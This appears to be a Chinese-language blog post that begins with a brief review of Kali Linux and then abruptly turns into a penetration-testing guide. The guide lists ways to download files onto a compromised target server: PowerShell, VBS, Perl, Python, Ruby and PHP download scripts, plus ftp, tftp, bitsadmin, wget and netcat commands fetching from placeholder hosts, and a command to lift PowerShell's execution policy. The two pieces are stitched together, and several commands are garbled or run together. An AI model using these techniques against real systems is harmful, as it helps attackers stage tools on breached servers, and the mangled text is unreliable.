Kali Linux 系统评测
系统:debian Linux 系统支持: 64位 32位
稳定性:最佳 性质:免费使用
适用业务: 信息取证 — WIFI与嗅探 —逆向工程 —社交工程
——-缺点与不足
防御级别低 — 硬件兼并性差
——-优点:
预装300+渗透测试工具[框架]节省环境配置
开源量无Git树和集成注入补丁
支持大设备以及拥有多语言
完全可定制开发环境的安全
环境兼并性高完全命令行操作
总结:
适合于高级渗透使用系统的开发范围和服务群体较广,个人认定为最完美的系统,系统使用前期难,吃力但熟练使用后无法离开,新手入手前建议多了解debian系统否则可能走较多弯路,用熟练后再实战。
在渗透中难免会遇到没上传点,只有编辑器和设置.后端权限等情况,而拿shell是渗透中必不可少的操作.这篇文章我总结了12个下载文件的方式,方便读者们将文件上传到目标服务器中拿到所需。
创建如下PSH脚本:
$p = New-Object System.Net.WebClient
$p.DownloadFile("http://domain/file","C:%homepath%file")执行:
PS C:> .test.ps1如果Powershell禁止执行了,使用如下命令:
C:>powershell set-executionpolicy unrestrictedVBS脚本内容
Set args = Wscript.Arguments
Url = "http://domain/file"
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", Url, False
xHttp.Send
with bStrm
.type = 1 '
.open
.write xHttp.responseBody
.savetofile " C:\%homepath%\file", 2 '
end with执行:
C:>cscript test.vbs脚本内容
#!/usr/bin/perl
use LWP::Simple;
getstore("http://domain/file", "file");执行
root@kali:~# perl test.pl脚本内容:
#!/usr/bin/python
import urllib2
u = urllib2.urlopen('http://domain/file')
localFile = open('local_file', 'w')
localFile.write(u.read())
localFile.close()执行:
root@kali:~# python test.py脚本内容
#!/usr/bin/ruby
require 'net/http'
Net::HTTP.start("www.domain.com") { |http|
r = http.get("/file")
open("save_location", "wb") { |file|
file.write(r.body)
}
}执行:
root@kali:~# ruby test.rb脚本内容
#!/usr/bin/php
<?php $data = @file("http://example.com/file");
$lf = "local_file";
$fh = fopen($lf, 'w');
fwrite($fh, $data[0]);
fclose($fh);
?>执行
root@kali:~# php test.php执行命令
ftp 127.0.0.1 username password get file exit执行命令
tftp -i host GET C:%homepath%file location_of_file_on_tftp_server执行命令
bitsadmin /transfer n http://domain/file c:%homepath%file执行命令
wget http://example.com/file执行命令
at file | nc -l 1234执行命令
nc host_ip 1234 > file